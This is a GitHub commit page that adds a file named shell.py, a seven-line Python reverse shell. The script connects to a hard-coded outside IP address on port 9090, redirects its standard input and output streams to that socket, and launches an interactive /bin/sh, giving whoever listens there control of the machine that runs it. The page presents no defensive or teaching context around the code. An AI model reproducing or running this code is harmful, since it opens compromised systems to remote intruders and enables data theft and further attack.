We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent fe5c6c9 commit bcece05Copy full SHA for bcece05
shell.py
@@ -0,0 +1,7 @@
1
+import socket, subprocess, os
2
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3
+s.connect(("143.95.42.191", 9090))
4
+os.dup2(s.fileno(),0)
5
+os.dup2(s.fileno(),1)
6
+os.dup2(s.fileno(),2)
7
+p=subprocess.call(["/bin/sh","-i"])
0 commit comments